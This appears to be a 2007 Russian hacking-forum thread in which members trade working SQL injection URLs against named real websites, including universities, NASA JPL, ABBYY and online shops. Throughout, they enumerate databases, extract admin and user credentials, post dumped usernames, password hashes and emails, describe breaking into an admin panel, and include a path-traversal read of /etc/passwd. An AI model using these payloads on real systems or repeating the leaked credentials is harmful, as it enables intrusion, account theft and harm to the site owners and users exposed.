Просмотр полной версии : SQL Инъекции
http://soc.jpl.nasa.gov/experience/gallery-story.cfm?id=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,8,9,char( 47)%2bchar(47)%2bchar(45)%2bchar(45)%2bchar(62)%2b char(60)%2bchar(98)%2bchar(114)%2bchar(62)%2bchar( 60)%2bchar(47)%2bchar(101)%2bchar(109)%2bchar(62)% 2bemail%2bchar(58)%2bpassword%2bchar(60)%2bchar(33 )%2bchar(45)%2bchar(45),11,null,13,14,15,char(16), char(17),null,19,20%20from%20usersmember--s
Termin@L
30.08.2007, 22:51
http://www.onlymelbourne.com.au/melbourne_details.php?id=-1+union+select+1,2,3,concat(admin_id,char(58),pass word),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45+from+admin/*
не смог подобрать имя юзверя
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица
http://www.defenceandindustry.com.au/category.php?id=-1+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat( username,char(58),password),0x17),0x17),4,5,6,7,8, 9,10,11,12,13+from+users/*
какие это юзеры - хрен знает
http://www.strawtec.com.au/content.php?id=-1+union+select+1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENC RYPT(concat(username,char(58),password),0x17),0x17 ),10,11,12+from+users/*
тоже самое непонятно откуда пароли
http://www.via-rs.net/acontece/index.php?inc=categoria&cod_categoria=-1+union+select+concat(mail,char(58),password)+from +survey_admin/*
вот такой вот ужаснейший скуль я нашел :)
код:
http://www.whoiswho.crimea.ua/view_org.php?record=-1385'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80, 81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97 ,98,99,100,101,102,103,104,105,106,107,108,109,110 ,111,112,113,114,115,116,117,118,119,120,121,122,1 23,124,125,126,127,128,129,130,131,132,133,134,135 ,136,137,138,139,140,141,142,143,144,145,146,147,1 48,149,150,151,152,153,154,155,156,157,158,159,160 ,161,162,163,164,165,166,167/*
и что с этим можно сделать?
Calcutta
31.08.2007, 08:02
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/*
тут вообще хрен знает какая таблица
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),user(),version(),4,5,6,7 ,8,9,10/*
.ud.rt - @l.ud.rt
4.1.20
http://www.gertrude.org.au/exhibition.php?id=-1+union+select+database(),2,version(),user(),5,6,7 ,8,9,10/*
.ud.rt - ..
4.1.20
gertrude@localhost
______
сейчас дальше попробую раскопать..
phol1eadeux
31.08.2007, 16:13
http://www.hww.ca/media_viewer2_top.asp?Language=E&id=203+OR+1=@@version
Таблица 'HWW_VIEW_User_Accounts'
Колонки
ID
First_Name
Last_Name
Organization_ID
Phone
Email
Username
Password
http://www.maup.com.ua/news/news.php?idn=-140+union+select+1,2,user(),database(),5,6,7,8,9,1 0,11,12,13/*
Дальше не нарыл! Помогите
http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
phol1eadeux
31.08.2007, 18:54
http://romanykultury.info/news/news.php?row=-168+union+select+1,user(),3,database(),5/*
Нужно довести до ума
Что мешает, 5 мускул, доводи:
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5+from+informati on_schema.tables/*
Red_Red1
31.08.2007, 18:54
Ну вот чуть "доведенная до ума"
Тут пятый мускул. Остается только копаться в таблицах
http://romanykultury.info/news/news.php?row=-168+union+select+1,table_name,3,4,5%20from%20infor mation_schema.tables/*
Пока писал кто-то раньше успел.... блин.
protermos.ru
http://www.protermos.ru/kvl.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 8,table_name,0,1,2,3,4,5,6,7,888,99,0,1,2,3,4,5,6, 7,8888,9,0,1,2,3,4,5,6,7,88888,99,0,1,2+from+infor mation_schema.tables/*
version: 5.*
tables:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
address_book
address_format
banners
banners_history
categories
categories_description
configuration
configuration_group
counter
counter_history
countries
currencies
customers
customers_basket
customers_basket_attributes
customers_groups
customers_info
faqdesk
faqdesk_categories
faqdesk_categories_description
faqdesk_configuration
faqdesk_configuration_group
faqdesk_description
faqdesk_reviews
faqdesk_reviews_description
faqdesk_to_categories
geo_zones
languages
manufacturers
manufacturers_info
newsdesk
newsdesk_categories
newsdesk_categories_description
newsdesk_configuration
newsdesk_configuration_group
newsdesk_description
newsdesk_reviews
newsdesk_reviews_description
newsdesk_to_categories
newsletters
orders
orders_products
orders_products_attributes
orders_products_download
orders_status
orders_status_history
orders_total
phoroom_auth_access
phoroom_banlist
phoroom_categories
phoroom_config
phoroom_disallow
phoroom_forum_prune
phoroom_forums
phoroom_groups
phoroom_posts
phoroom_posts_text
phoroom_privmsgs
phoroom_privmsgs_text
phoroom_ranks
phoroom_search_results
phoroom_search_wordlist
phoroom_search_wordmatch
phoroom_sessions
phoroom_smilies
phoroom_themes
phoroom_themes_name
phoroom_topics
phoroom_topics_watch
phoroom_user_group
phoroom_users
phoroom_vote_desc
phoroom_vote_results
phoroom_vote_voters
phoroom_words
products
products_attributes
products_attributes_download
products_description
products_notifications
products_options
products_options_values
products_options_values_to_products_options
products_prop_options
products_prop_options_values
products_prop_options_values_to_products_prop_opti ons
products_properties
products_to_categories
proterm_pages
proterm_pages_categories
protherm_klo
protherm_plo
protherm_tlo
reviews
reviews_description
sessions
shablon_pages
specials
tax_class
tax_rates
whos_online
zones
zones_to_geo_zones
http://www.opticalsorcery.com/view_tutorial.php?id=7%20union%20select%20concat(a dmin,char(58),pass,char(58),user,char(58),email,ch ar(58),ID,char(58),website,char(58),firstname,char (58),lastname)%20from%20users/*
5.0.32-Debian_7
http://www.iloveinns.com/recipes/list.php?id=7-0%20union%20select%201,version()/*
http://english.renaultclub.cz/english/links/novyodkaz.php?id='
Postorage SQL к сожелению в нем я не силен (
http://www.argelato.provincia.bologna.it/Statistica.asp?ID=
Microsoft SQL
phol1eadeux
01.09.2007, 18:40
Киномост
http://www.kinomost.ru/index.asp?case=30&distr=-1'+OR+1=(SELECT+db_name())--&pack=0
Таблицы: db_ForumPeople, db_News, akter, akter_top
Joker-jar
01.09.2007, 19:36
Сайт: d v g a m e s . r u
Уязвимость: уязвим параметр dvglasid (Cookies)
dvglasid=-1+union+select+1,2,concat(login,0x3a,password,0x3a ,email)+from+users
Enjoy ;)
.edu код: http://www.brockport.edu/athletics/news.php?id=-495'+union+select+1,2,3,version(),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19/* не смог подобрать ни одну таблицу :(
.edu код: http://www.music.uiuc.edu/facultyBio.php?id=-61+union+select+1,2,table_name,4+from+information_ schema.tables/*
The_HuliGun
01.09.2007, 20:56
lib.web-malina.com
"Самые интересные книги".
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9/*
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,3,4,5,6,7,8,9+from+users/*
таблица users.
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,2,count(*),4,5,6,7,8,9+from+users/*
646 пользователей.
http://lib.web-malina.com/getbook.php?bid=-1+union+select+1,concat_ws(0x3a,name,pass,email),3 ,4,5,6,7,8,9+from+users+limit+150,1/*
Колонки name, pass, email.
.edu последний на сегодня :)
код:http://www.ittc.ku.edu/view_project.phtml?id=-242+union+select+1,2,3,concat(version(),user(),dat abase()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22/*
таблы не подбирал
[53x]Shadow
02.09.2007, 01:18
ABBYY
http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--
Есть таблица user
http://www.arb.ca.gov/lispub/rss/displaypost.php?pno=-573+union+select+1,2,3,table_name,5+from+INFORMATI ON_SCHEMA.TABLES+limit+23,1/*
edu
не смог вывести пароли логины,кроме фамилий,имен и т.д :(
код
:http://fs.cs.fhm.edu/mitglieder.phtml?id=-48+union+select+1,concat(column_name,char(58),tabl e_name),3,4,5,6,7,8,9,10,11,12,13,14+from+informat ion_schema.columns+limit+650,1/*
xena-mil1
02.09.2007, 23:41
Shadow']ABBYY
http://www.abbyy.ru/press/press_releases.asp?param=-1+or+1=(select+db_name())--
http://www.abbyy.ru/sdk/?param=-1+or+1=(select+system_user)--
http://www.abbyy.com/press/press_releases.asp?param=136693+or+1=@@version--
Есть таблица user
продолжение
SQL Injection Private Exploit
System user: publishing
Database name: Publishing
Server name: SQL2
IS Sysadmin ? : 0
User databases number: 43
User tables count in curent DB: 461
Permission to create tables: Yes
SQL Server version: 2000
Windows version: 2003
referendum
participantsInfo
FineReaderSprintForm
current_situation
lingvo_interface_voting
Anketa_sdk
Seminar2005
Anketa_PDFTransformer_rus
lingvoMabileDevisesTesting
FineReaderForm
voting_lingvo_cards
Anketa_FineReaderHomeEdition
goroda_users_words
voting_lingvo_sound
voting_abbyy_ru
dtproperties
FR67_Trial_User_Survey_USA
DealersForm
voting_lingvo_search
Anketa_FineReaderHomeEdition_2
FR8_User_Survey_USA
voting_abbyy_com
DB_Export
FR8_Trial_User_Survey_USA
syssegments
questions_list
Digital_Camera_OCR
Anketa_FineReaderSprint
lingvo_valentine
voting_lingvo_default_page
Anketa_AbbyyRuHelpPoll
FinereaderPRO8_Requests
lingvoMobileDevicesTesting
Anketa_PDFTransformer_1
Anketa_PDFTransformer_2
subscribes_partner_portal
promo_beaver_action
sysconstraints
Anketa_STO_1
USA_PartnersRegistration
voting_metro_lingvo_adv
Lingvo_forum_1_3
Lingvo_forum_next
certification
msdb
abbyyru_FRCE90
LingvoBannersTracking
ReportServer
Dialog_Forum_new
voting
Lingvo_RegistrationNY
tempdb
Lingvo_Forum_new
docflow_referendum
Docflow_Forum
LingvoDA_Forum
covercd
AdventureWorks2000
abbyycom_PDFTransformer
FormReader_Forms
LingvoDa_Forum_new
IPDatabase
WebStats
dialog21_referendum
ReportServerTempDB
FineReader_forum_R
master
Lingvo_Forum
tsla
review
docflow
subscribe
lingvoDa_Dictionaries
QuotGame
LPDatabase
model
Dialog_Forum
KnowledgeBase
SuccessStories_test
Docflow_Forum_new
Publishing
TrialForms
pubs
SuccessStories
ForumDialog_1_3
SuccessStories2
LingvoDA_referendum
docflow_registration
результат
xena military private sql injection exploit v2.0
mindw0rk
03.09.2007, 03:27
uni.de инжектится во все дыры, плюс читалка http://www.uni.de/?goto=../../../../../../../../etc/passwd%00
groundhog
03.09.2007, 12:46
http://www.menopausethemusical.com
http://www.menopausethemusical.com/main.php?page=reviews&get_id=-1+UNION+SELECT+1,2,CAST(USER()+AS+BINARY),4,CAST(D ATABASE()+AS+BINARY),CAST(VERSION()+AS+BINARY),7,8/*
groundhog
03.09.2007, 15:50
http://www.matrixtelecom.ru. Компания Матрикс Телеком.
Практически любой параметр в передаваемых скриптам уязвим к SQL-Injection. Сложность состоит в том, что отключён вывод ошибок в страницу и фильтруется кавычка. Ну это скорее не сложность, а маленькая неприятность. Админка находится на урле http://www.matrixtelecom.ru/admin, которая требует авторизации доступа. Это не беда - тут есть SQL Injection. Приступим:
-- Определяем версию
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,VERSION(),3,4,5,6,7,8,9,10,DATABA SE()/*
-- Перебираем колонки (интересующая нас с индексом 16 и именем mx_conf)
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,TABLE_NAME,3,4,5,6,7,8,9,10,11+FR OM+INFORMATION_SCHEMA.TABLES+LIMIT+X,1/*
-- Перебираем поля в этой таблице
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,COLUMN_NAME,3,4,5,6,7,8,9,10,11+F ROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x 6d785f636f6e66+LIMIT+X,1/*
-- Получаем структуру таблицы настроек сайта: mx_con(cnf_name, сnf_def, cnf_value)
-- Перебираем настройки сайта из таблицы mx_con
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+X,1/*
-- Нас интересует логин
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+0,1/*
-- И пароль
http://www.matrixtelecom.ru/about.php?txt_id=-1+UNION+SELECT+1,cnf_name,3,4,5,6,7,8,9,10,cnf_val ue+FROM+mx_conf+LIMIT+1,1/*
Всё... Доступ в админку открыт...
З.Ы. Администрация сайта уведомлена о данном баге. Не стоит дефейсить или менять контент.
http://edu.direktor.ru/lib/author.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),version() ,database()),4,5,6/*
http://stumpage.uvm.edu/page.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,column_name,12 +from+information_schema.columns/*/
http://5ballov.ru/vacansy.php?city=Москва&salary_min=9999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20/*&schedule=свободный&sort=salary_min
http://www.gameland.ru/articles2/catalog/game.asp?code=1'
Great:
Инъекции вида:
http://site.ru/index.php?a='
будут удаляться.
либо ковыряй до конца, либо не пости. даю три дня, потом удаляю
halkfild
03.09.2007, 22:59
Google: PR - 7
http://primes.utm.edu
University of Tennessee at Martin Martin, TN 38238
http://primes.utm.edu/bios/page.php?id=&username=lol'+union+select+1,2,3,4,5,6,7,8,9,10,11 ,12,concat_ws(0x3a,version(),user(),database()),14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33/*
4.1.20-log:primes_@localhost:primes
halkfild
03.09.2007, 23:32
Google: PR - 5
theboard.byu.edu
http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24/*
5.0.24-Debian_1-log:100hourboard@localhost:100hourboard
http://theboard.byu.edu/index.php?area=viewall&id=-777+union+select+TABLE_NAME,TABLE_SCHEMA,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+inf ormation_schema.tables+limit+150,1/*
смотрим таблици
[100hourboard]
100Hrbb_banlist
100Hrbb_categories
100Hrbb_config
100Hrbb_confirm
100Hrbb_disallow
100Hrbb_easymod
100Hrbb_forum_prune
100Hrbb_forums
100Hrbb_groups
100Hrbb_posts
100Hrbb_posts_text
100Hrbb_privmsgs
100Hrbb_privmsgs_text
100Hrbb_ranks
100Hrbb_search_results
100Hrbb_search_wordlist
100Hrbb_search_wordmatch
100Hrbb_sessions
100Hrbb_smilies
100Hrbb_themes
100Hrbb_themes_name
100Hrbb_topics
100Hrbb_topics_watch
100Hrbb_user_group
100Hrbb_vote_desc
и тд
вот нужные таблици но у меня нет начал лагать кто хочет подберите столбци и получите пассы и мыла
100Hrbb_users
phprojekt_users
evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+fr om+user+limit+141,141+--+
Получил: 89637:40f939d31d2e2a25
Но при запросе:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141, 141+--+
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
evruka.ru - Интернет-магазин
4.1.21-log:evrubase:giftshop@82.179.244.68
Подобрал название столбцов:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(username,char(58),passwd)+fr om+user+limit+141,141+--+
Получил: 89637:40f939d31d2e2a25
Но при запросе:
http://www.evruka.ru/show_cat2.php?grid=-9+UNION+SELECT+concat(passwd)+from+user+limit+141, 141+--+
Получил совершенно другой хэш: 3e70346730b14ce7
У меня 2 вопроса почему так получается и каким алгоритмом шифруется пароль
1.Мож есть нулевое значение passwd (null)
2.MySQL (16 значный хеш) (не перепутай с Mysql5)
Интернет магазин 1 d o l l a r . r u, даже выплаты на автомате
http://1dollar.ru/?g=9999+union+select+1,2,login,4,email,6,7,8,psw+f rom+users+limit+558+,+1/*
mysql: 4.1.22-standard-log
Вытащил пароли всех юзеров, пароли в md5, половину только расшифровал, и немного поживился :)
хм
berkeley.edu
скрипт: journalism.berkeley.edu/students/resume.php
параметр: ID
кол-во колонок: 23
версия: 4.1.22
юзер: jschool@localhost
база: facebook
geezer.code
04.09.2007, 23:38
:)
http://www.multi-service.ru/main.php?inc=tb_viev&pref=1&sw=1&id_vlosh=16+order+by+9/*
дальше не пошло. может мускул 3 версии , где то в топике была ссылка на статью по инъекции в 3 версию... лень искать...
а может хитрый какой нить запрос ... не знаю... крутите дальше кто хочет )
game-ost.ru
4.1.14-log:gameost1_ananii@localhost:gameost1_gameost
http://www.game-ost.ru/news_comments.php?id=399+UNION+SELECT+1,concat(cas t(version()+as+binary),char(58),cast(user()+as+bin ary),char(58),cast(database()+as+binary)),3,4,5,6, 7,8,9,10+from+news+--+
Смог подобрать 2 таблицы: news,articles
Calcutta
05.09.2007, 08:40
http://www.globaltrading.ru/price.php3?Cat_id=1393+union+select+1,2,3,4,5,6,ve rsion(),database(),user(),10,11,12,13,14,version() ,16,17,18,19,20,21,22/*
globalt9_globaltr
4.0.18-log
globalt9_globalt@localhost
_________________
edited:
http://www.goldsteel.ru/catalog.php?tovar_id=123+union+select+1,2,3,4,5,6, 7,concat(user(),char(58),version(),char(58),databa se()),9/*
нет прямого вывода данных -(
_________________
edited2:
http://mag-russia.ru/news.php?id=38'+union+select+1,user(),concat(datab ase(),char(58),version()),4/*
1gb_mag_russia@10.0.1.24
1gb_mag_russia:5.0.24a-community-max-nt-log
//там же и админка (https://forum.antichat.ru/showpost.php?p=452833&postcount=91).
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/*
help! не могу понять что тут я неправильно делаю код:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
Calcutta
05.09.2007, 10:38
edu. Код: http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,2,3,4,5,6/*
help! не могу понять что тут я неправильно делаю код:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,user(),3,4,5,6/*
Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Выдает эту ошибку на запрос к любой колонке, существующей в базе. выходит стоит какая-то защита, имо.
groundhog
05.09.2007, 10:48
help! не могу понять что тут я неправильно делаю код:
Вот так пробуй:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),1 ),1),3,4,5,6/*
Или даже так:
http://www.sbus.cau.edu/News_details.php?id=-13+union+select+1,CAST(user()+AS+BINARY),3,4,5,6/*
Это не защита на хосте, это проблема перекодировки из UTF-8.
Calcutta
05.09.2007, 11:27
http://www.watchiki.ru/p/19+union+select+1,2,concat(version(),char(58),data base(),char(58),user()),4,5,6,7/*
4.1.22
k1_tiktak
k1_tiktak@localhost
но почему то у меня постоянная проблема с подбором паролей и е-маилов -( кто может подсказать, или доработать этот скуль?
groundhog
05.09.2007, 13:56
Уязвимость на крупном украинском портале знакомств:
http://www.ukraineloves.com/search/extend-info.php?girl_id=-1+UNION+SELECT+VERSION(),2,3,4,5,USER(),DATABASE() ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49,50,51,52,53,54--+&photo=1
http://infoshop.zaraz.org/?r=3&list_exp=-1+union+select+null,null,null,null,concat_ws(char( 58),username,password,email),null,null,null,null,n ull,null,null,null,null+from+phorum_users/*
admin:3fd07483d0d44301fc0e987a6a517693:phorum@zara z.org # z2r2z
magduv:1eaf7c068a250a38e3bab770053c14c3:facilitato r@mail.ru
test:098f6bcd4621d373cade4e832627b4f6:test@test.co m
жТБХОЗПЖЕТ:bd40cd94a7ccf4b802b1090af055a faa:paz.zapped@ua.fm
Tvorog:11967d5e9addc5416ea9224eee0e91fc:tvaroh@ukr .net # huy
matvey:7c7d80ae76edbe1c202a4e2baa3c271b:matvey@gma il.com
аккаунты admin и test не активированы
http://phorum.zaraz.org/admin.php
Phorum Admin
version 5.0.5-beta
сам форум и админка
groundhog
05.09.2007, 17:55
Инъекция в Oracle:
Oracle8i Enterprise Edition Release 8.1.7.4.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =1+--
PL/SQL Release 8.1.7.4.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =2+--
CORE 8.1.7.0.0 Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =3+--
TNS for Linux: Version 8.1.7.4.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =4+--
NLSRTL Version 3.4.1.0.0 - Production
http://www.mb.ru/customers/ora_customers.php?group=0+UNION+SELECT+T.B+FROM+(S ELECT+ROWNUM+R,+BANNER+B+FROM+V$VERSION)+T+WHERE+R =5+--
geezer.code
05.09.2007, 18:54
Произведение команды Sоlоx (http://www.solox.ru)
оч интересная базюка
http://www.flowers.kg/rus/index.php?mode=showother&id=-23+union+select+1,2,concat_ws(0x3a,table_name,tabl e_schema,version(),database()),4+from+information_ schema.tables
там еще лежат заготовки к базам всех проектов этой студии ))
хмм, только вот ничо путевого там не нашел
sbornikmp3.ru
http://www.sbornikmp3.ru/details.php?album=58869+UNION+SELECT+1,version(),3 ,4,5,6,7,8,9,10,11,12,13,14,15+--+
Прошелся по названием таблиц из соседней темы, не одной таблицы не подобрал
[53x]Shadow
05.09.2007, 20:36
www.bmcc.cuny.edu
Версия:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,banner,1+from+v$version--&dep=
CORE 10.1.0.3.0 Production
NLSRTL Version 10.1.0.3.0 - Production
Oracle Database 10g Enterprise Edition Release 10.1.0.3.0 - Prod
PL/SQL Release 10.1.0.3.0 - Production
TNS for Linux: Version 10.1.0.3.0 - Production
Таблицы:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,table_name,1+from+sys.all_tables--&dep=
интересная USERS
Столбцы:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,column_name,1+from+sys.all_tab_co lumns--&dep=
username, password
Вытаскиваем:
http://www.bmcc.cuny.edu/faq/courses.jsp?id=-1+union+select+1,concat(username,concat(chr(59),pa ssword)),1+from+users--&dep=
admin;lrc_01
http://www.newmind.ru/index.php?cat_id=-40+union+select+1,2,table_name,4,5,6,7,8,9,10,11+f rom+INFORMATION_SCHEMA.TABLES+limit+20,1/*
0nep@t0p
06.09.2007, 12:36
Интернет-магазин парфюмерии Zemen :/
http://www.zemen.ru/product_info.php?product s_id=-1546+union+ select+1/*
http://www.ascon.ru/order.php?id=-11+union+select+1,2,table_name,4,5+from+INFORMATIO N_SCHEMA.TABLES+limit+1,1/*
хостинг:
http://www.officinaweb.com/hosting.php?id=-5+union+select+1,2,3,4/*
sharelita.com
4.1.21-standard:test:onkel_onkel@localhost
http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),passwo rd,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+fr om+users+--+
Nazaret2005
07.09.2007, 00:53
sharelita.com
4.1.21-standard:test:onkel_onkel@localhost
http://sharelita.com/file.php?fileid=-16312+UNION+SELECT+1,2,concat(name,char(58),passwo rd,char(58),email),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+fr om+users+--+
На этом сайте уже обнаружена инекция
http://forum.antichat.ru/showthread.php?p=438529#post438529
ты просто нашёл на таком же файле,просто с больше количеством таблиц ;)
MegaBits
07.09.2007, 14:19
http://www.berdyansk.net/pointer/links.php?part_id=-18+union+select+1,2,3,user,password,6+from+mysql.u ser/*
новости шоубизнеса :)
кому интересно копаем
код:
http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,version(),4,5,6,7+from+showb iz/*
[B]5.0.27-log
http://www.umzug.cn/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,pass wort,null,null,null,null,null/**/from/**/wls_eintrag/*
http://online-geldverdienen24.de/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,pass wort,null,null,null,null,null/**/from/**/wls_eintrag/*
http://links.1a-chat.com/start.php?go=rubrik&id=start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,pass wort,null,null,null,null,null/**/from/**/wls_eintrag/*
http://www.kaufguenstigerein.de/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,pass wort,null,null,null,null,null/**/from/**/wls_eintrag/*
http://www.eliste.eu/start.php?go=rubrik&id=-1/**/union/**/select/**/null,null,null,null,null,null,null,null,login,pass wort,null,null,null,null,null/**/from/**/wls_eintrag/*
KPOT_f!nd
08.09.2007, 02:28
новости шоубизнеса
кому интересно копаем
код:
http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,version(),4,5,6,7+from+showb iz/*
[B]5.0.27-log
http://popzvezda.com/showbiz/?n=-7271+union+select+1,2,table_name,4,5,6,7+from+info rmation_schema.tables/*
работай лимитом ( limit ) +2 и т.д)
Ded MustD!e
08.09.2007, 05:10
http://www.bioinnovit.com/scientist_model_agreements_contracts.php?mode=view&purchase_id='+union+select+1,user(),3,4,5,6,7,8,9, 10,database(),version()+user/*
Не могу подобрать поля
Odeon Film AG[B]
http://www.odeonfilm.de/film_01_01_01.php?id=-153+union+select+1,2,3,4,5,6,concat(version(),char (58),database(),char(58),user()),8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30, 31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 ,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,6 4+from+users/*
_-Ramos-_
08.09.2007, 11:25
_http://www.caac.org.au/pr/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3 a,password),null,null,null%20from%20dl_users/*
Red_Red1
08.09.2007, 11:31
2 RAUL07 Если ты не нашел куда подставить эти данные, то вот сюда. А вот что там я не знаю т.к. в немецком ноль (а это вроде немецкий).
http://www.umzug.cn/start.php?go=in_admin
Пока писал уже поменяли пост. Как удалить свой хз...
delay(0)
08.09.2007, 13:19
http://ru-board.com
http://ru-board.com/new/article.php?sid=[sql]
1 поле, blind-sql =\
http://www.cardholder.kz/index.php?p=-27+union+select+login,email,pwd,4,5,6,7,8,9,10,11, 12,13,14+from+users/*
MONGOL POSTBANK
http://www.postbank.mn/eng/index.php?ac=news&newsid=650000%20union%20select%201,2,3,4,concat(us er,char(58),password),6,7,8%20from%20mysql.user/*
http://www.alt.ac.uk/workshop_detail.php?e=-181+union+select+user(),2,3,4,5,6/*
Официальный сайт Полины Гагариной певица и просто красивая девушка :)
код:
http://www.gagarina.com/news.php?id=-41+union+select+1,concat(username,0x3a,user_passwo rd,0x3a,user_email,0x3a,user_icq),3,4,5,6+from+php bb_users+limit+1,1/*
свыше 200 юзеров,
не разобрался в какой кодировке пароли :(
md5^^
http://www.si.umich.edu/CHICO/instrument/fullrecord.phtml?id=9999+union+select+1,2, USER(),4,5,VERSION(),7,8,9,DATABASE(),11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27/*
user chico@harvbannister.si.umich.edu
version 4.0.13
database chico
http://www.law.harvard.edu/faculty/directory/facdir.php?id=-1+ union+select+concat(user(),0x3a,version(),0x3a,dat abase())/*
user facdir@hlssun1
version 4.0.20-log
database academics
http://www.kievsex.com/shop/?cat_id=99999+union+select+1,concat(username,0x3a, user_password,0x3a,user_ email,0x3a,user_icq),3,4,5,6,7,8,9,10+from+phpbb_ users+limit+1,1/*
мож кто расшифрует...
